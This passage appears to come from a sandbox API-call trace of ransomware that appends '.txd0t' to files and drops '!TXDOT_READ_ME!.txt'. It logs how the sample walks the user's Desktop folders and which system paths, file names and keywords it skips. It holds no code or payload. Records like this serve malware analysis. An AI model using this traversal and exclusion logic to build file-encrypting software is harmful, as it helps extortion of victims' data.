cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0090.052] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="OO_s81.avi.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\OO_s81.avi.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\OO_s81.avi.txd0t" [0090.052] PathFindExtensionW (pszPath="OO_s81.avi.txd0t") returned=".txd0t" [0090.052] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.052] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c778d70, ftCreationTime.dwHighDateTime=0x1d5e836, ftLastAccessTime.dwLowDateTime=0x91a2deb0, ftLastAccessTime.dwHighDateTime=0x1d5ee67, ftLastWriteTime.dwLowDateTime=0x5082b988, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xea8a, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="PYzrJzKfYy0WH.jpg.txd0t", cAlternateFileName="PYZRJZ~1.TXD")) returned 1 [0090.052] StrCmpW (psz1="PYzrJzKfYy0WH.jpg.txd0t", psz2=".") returned 1 [0090.052] StrCmpW (psz1="PYzrJzKfYy0WH.jpg.txd0t", psz2="..") returned 1 [0090.052] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0090.052] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0090.052] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="PYzrJzKfYy0WH.jpg.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\PYzrJzKfYy0WH.jpg.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\PYzrJzKfYy0WH.jpg.txd0t" [0090.052] PathFindExtensionW (pszPath="PYzrJzKfYy0WH.jpg.txd0t") returned=".txd0t" [0090.052] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.052] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61d5de10, ftCreationTime.dwHighDateTime=0x1d5eecd, ftLastAccessTime.dwLowDateTime=0x46bf2c70, ftLastAccessTime.dwHighDateTime=0x1d5e7ad, ftLastWriteTime.dwLowDateTime=0x509cf504, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7a3, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="rBWrlFNmCY.bmp.txd0t", cAlternateFileName="RBWRLF~1.TXD")) returned 1 [0090.052] StrCmpW (psz1="rBWrlFNmCY.bmp.txd0t", psz2=".") returned 1 [0090.052] StrCmpW (psz1="rBWrlFNmCY.bmp.txd0t", psz2="..") returned 1 [0090.052] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0090.052] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0090.052] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="rBWrlFNmCY.bmp.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\rBWrlFNmCY.bmp.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\rBWrlFNmCY.bmp.txd0t" [0090.052] PathFindExtensionW (pszPath="rBWrlFNmCY.bmp.txd0t") returned=".txd0t" [0090.052] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.052] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37d9fe90, ftCreationTime.dwHighDateTime=0x1d5e7c3, ftLastAccessTime.dwLowDateTime=0xf24c1b0, ftLastAccessTime.dwHighDateTime=0x1d5efd4, ftLastWriteTime.dwLowDateTime=0x50a8df2a, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x171ce, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="RnjQ5ZSPpYJwR3B.jpg.txd0t", cAlternateFileName="RNJQ5Z~1.TXD")) returned 1 [0090.052] StrCmpW (psz1="RnjQ5ZSPpYJwR3B.jpg.txd0t", psz2=".") returned 1 [0090.052] StrCmpW (psz1="RnjQ5ZSPpYJwR3B.jpg.txd0t", psz2="..") returned 1 [0090.052] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0090.053] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0090.053] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="RnjQ5ZSPpYJwR3B.jpg.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\RnjQ5ZSPpYJwR3B.jpg.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\RnjQ5ZSPpYJwR3B.jpg.txd0t" [0090.053] PathFindExtensionW (pszPath="RnjQ5ZSPpYJwR3B.jpg.txd0t") returned=".txd0t" [0090.053] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.053] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3379b30, ftCreationTime.dwHighDateTime=0x1d5eeaa, ftLastAccessTime.dwLowDateTime=0x23f0b1e0, ftLastAccessTime.dwHighDateTime=0x1d5e277, ftLastWriteTime.dwLowDateTime=0x50b022e0, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x44c0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="RwNhKXau 7hWtmS6.png.txd0t", cAlternateFileName="RWNHKX~1.TXD")) returned 1 [0090.053] StrCmpW (psz1="RwNhKXau 7hWtmS6.png.txd0t", psz2=".") returned 1 [0090.053] StrCmpW (psz1="RwNhKXau 7hWtmS6.png.txd0t", psz2="..") returned 1 [0090.053] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0090.053] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0090.053] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="RwNhKXau 7hWtmS6.png.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\RwNhKXau 7hWtmS6.png.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\RwNhKXau 7hWtmS6.png.txd0t" [0090.053] PathFindExtensionW (pszPath="RwNhKXau 7hWtmS6.png.txd0t") returned=".txd0t" [0090.053] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.053] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeff63820, ftCreationTime.dwHighDateTime=0x1d5e374, ftLastAccessTime.dwLowDateTime=0xff2484f0, ftLastAccessTime.dwHighDateTime=0x1d5ea59, ftLastWriteTime.dwLowDateTime=0x50e9405f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x10996, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="s2-ewyNmBK.gif.txd0t", cAlternateFileName="S2-EWY~1.TXD")) returned 1 [0090.053] StrCmpW (psz1="s2-ewyNmBK.gif.txd0t", psz2=".") returned 1 [0090.053] StrCmpW (psz1="s2-ewyNmBK.gif.txd0t", psz2="..") returned 1 [0090.053] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0090.053] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0090.053] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="s2-ewyNmBK.gif.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\s2-ewyNmBK.gif.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\s2-ewyNmBK.gif.txd0t" [0090.053] PathFindExtensionW (pszPath="s2-ewyNmBK.gif.txd0t") returned=".txd0t" [0090.053] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.053] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x685a7a10, ftCreationTime.dwHighDateTime=0x1d5e744, ftLastAccessTime.dwLowDateTime=0xad94c880, ftLastAccessTime.dwHighDateTime=0x1d5ea2b, ftLastWriteTime.dwLowDateTime=0x50f2dc3c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11419, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="SbwWluUpbQiQnJG8qbe.pdf.txd0t", cAlternateFileName="SBWWLU~1.TXD")) returned 1 [0090.053] StrCmpW (psz1="SbwWluUpbQiQnJG8qbe.pdf.txd0t", psz2=".") returned 1 [0090.053] StrCmpW (psz1="SbwWluUpbQiQnJG8qbe.pdf.txd0t", psz2="..") returned 1 [0090.053] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0090.053] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0090.053] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="SbwWluUpbQiQnJG8qbe.pdf.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\SbwWluUpbQiQnJG8qbe.pdf.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\SbwWluUpbQiQnJG8qbe.pdf.txd0t" [0090.053] PathFindExtensionW (pszPath="SbwWluUpbQiQnJG8qbe.pdf.txd0t") returned=".txd0t" [0090.053] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.053] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc63b7220, ftCreationTime.dwHighDateTime=0x1d5eb85, ftLastAccessTime.dwLowDateTime=0x34ae9370, ftLastAccessTime.dwHighDateTime=0x1d5e91c, ftLastWriteTime.dwLowDateTime=0x50f2dc3c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x16946, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="SJcMEwGL9beIVl4.wav.txd0t", cAlternateFileName="SJCMEW~1.TXD")) returned 1 [0090.053] StrCmpW (psz1="SJcMEwGL9beIVl4.wav.txd0t", psz2=".") returned 1 [0090.053] StrCmpW (psz1="SJcMEwGL9beIVl4.wav.txd0t", psz2="..") returned 1 [0090.053] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0090.053] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0090.054] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="SJcMEwGL9beIVl4.wav.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\SJcMEwGL9beIVl4.wav.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\SJcMEwGL9beIVl4.wav.txd0t" [0090.054] PathFindExtensionW (pszPath="SJcMEwGL9beIVl4.wav.txd0t") returned=".txd0t" [0090.054] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.054] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xca249080, ftCreationTime.dwHighDateTime=0x1d5ecb4, ftLastAccessTime.dwLowDateTime=0x5137ec48, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5137ec48, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="T2UrA", cAlternateFileName="")) returned 1 [0090.054] StrCmpW (psz1="T2UrA", psz2=".") returned 1 [0090.054] StrCmpW (psz1="T2UrA", psz2="..") returned 1 [0090.054] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0090.054] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0090.054] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="T2UrA", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA" [0090.054] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch="\\windows\\system32\\") returned 0x0 [0090.054] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.054] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch="\\windows\\system\\") returned 0x0 [0090.054] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.054] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch="\\appdata\\roaming\\") returned 0x0 [0090.054] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch="\\appdata\\local\\") returned 0x0 [0090.054] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch="\\appdata\\locallow\\") returned 0x0 [0090.054] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch="\\all users\\microsoft\\") returned 0x0 [0090.054] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch="\\inetpub\\logs\\") returned 0x0 [0090.054] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch=":\\boot\\") returned 0x0 [0090.054] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch=":\\perflogs\\") returned 0x0 [0090.054] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch=":\\programdata\\") returned 0x0 [0090.054] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch=":\\drivers\\") returned 0x0 [0090.054] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch=":\\wsus\\") returned 0x0 [0090.054] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch=":\\efstmpwp\\") returned 0x0 [0090.054] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch=":\\$recycle.bin\\") returned 0x0 [0090.054] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch="crypt_detect") returned 0x0 [0090.054] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch="cryptolocker") returned 0x0 [0090.054] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch="ransomware") returned 0x0 [0090.054] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch="C:\\WINDOWS") returned 0x0 [0090.054] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch="C:\\Program Files (x86)") returned 0x0 [0090.054] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch="C:\\Program Files") returned 0x0 [0090.054] GetProcessHeap () returned 0xe30000 [0090.054] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4bc) returned 0xec7a58 [0090.055] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA" [0090.055] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA", psz2="\\*", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\*") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\*" [0090.055] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\*", lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xca249080, ftCreationTime.dwHighDateTime=0x1d5ecb4, ftLastAccessTime.dwLowDateTime=0x5137ec48, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5137ec48, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec20f0 [0090.055] StrCmpW (psz1=".", psz2=".") returned 0 [0090.055] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xca249080, ftCreationTime.dwHighDateTime=0x1d5ecb4, ftLastAccessTime.dwLowDateTime=0x5137ec48, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5137ec48, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.055] StrCmpW (psz1="..", psz2=".") returned 1 [0090.055] StrCmpW (psz1="..", psz2="..") returned 0 [0090.055] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x510377ec, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x510377ec, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x510d01cb, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0090.055] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0090.055] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0090.055] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA" [0090.055] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\" [0090.055] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\!TXDOT_READ_ME!.txt" [0090.055] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0090.055] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0090.055] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0090.055] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0090.055] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0090.055] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0090.055] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0090.055] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0090.055] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0090.055] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0090.055] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0090.055] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0090.055] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0090.055] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0090.055] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0090.055] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0090.055] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabe15650, ftCreationTime.dwHighDateTime=0x1d5e500, ftLastAccessTime.dwLowDateTime=0xcd226e0, ftLastAccessTime.dwHighDateTime=0x1d5eb39, ftLastWriteTime.dwLowDateTime=0x5137ec48, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1579, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="36V5IRtis-.pps.txd0t", cAlternateFileName="36V5IR~1.TXD")) returned 1 [0090.055] StrCmpW (psz1="36V5IRtis-.pps.txd0t", psz2=".") returned 1 [0090.056] StrCmpW (psz1="36V5IRtis-.pps.txd0t", psz2="..") returned 1 [0090.056] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA" [0090.056] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\" [0090.056] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\", psz2="36V5IRtis-.pps.txd0t", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\36V5IRtis-.pps.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\36V5IRtis-.pps.txd0t" [0090.056] PathFindExtensionW (pszPath="36V5IRtis-.pps.txd0t") returned=".txd0t" [0090.056] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.056] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa3cba40, ftCreationTime.dwHighDateTime=0x1d5efc5, ftLastAccessTime.dwLowDateTime=0x246cc5d0, ftLastAccessTime.dwHighDateTime=0x1d5e800, ftLastWriteTime.dwLowDateTime=0x51011668, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xddb4, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="3dId0lsBJQweABTLa.bmp.txd0t", cAlternateFileName="3DID0L~1.TXD")) returned 1 [0090.056] StrCmpW (psz1="3dId0lsBJQweABTLa.bmp.txd0t", psz2=".") returned 1 [0090.056] StrCmpW (psz1="3dId0lsBJQweABTLa.bmp.txd0t", psz2="..") returned 1 [0090.056] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA" [0090.056] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\" [0090.056] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\", psz2="3dId0lsBJQweABTLa.bmp.txd0t", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\3dId0lsBJQweABTLa.bmp.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\3dId0lsBJQweABTLa.bmp.txd0t" [0090.056] PathFindExtensionW (pszPath="3dId0lsBJQweABTLa.bmp.txd0t") returned=".txd0t" [0090.056] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.056] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xde3152a0, ftCreationTime.dwHighDateTime=0x1d5efae, ftLastAccessTime.dwLowDateTime=0xc34157f0, ftLastAccessTime.dwHighDateTime=0x1d5eab4, ftLastWriteTime.dwLowDateTime=0x510377ec, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x16e02, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="8_rlQ cdl 6S_NtQ4.ods.txd0t", cAlternateFileName="8_RLQC~1.TXD")) returned 1 [0090.056] StrCmpW (psz1="8_rlQ cdl 6S_NtQ4.ods.txd0t", psz2=".") returned 1 [0090.056] StrCmpW (psz1="8_rlQ cdl 6S_NtQ4.ods.txd0t", psz2="..") returned 1 [0090.056] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA" [0090.056] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\" [0090.056] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\", psz2="8_rlQ cdl 6S_NtQ4.ods.txd0t", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\8_rlQ cdl 6S_NtQ4.ods.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\8_rlQ cdl 6S_NtQ4.ods.txd0t" [0090.056] PathFindExtensionW (pszPath="8_rlQ cdl 6S_NtQ4.ods.txd0t") returned=".txd0t" [0090.056] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.056] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, 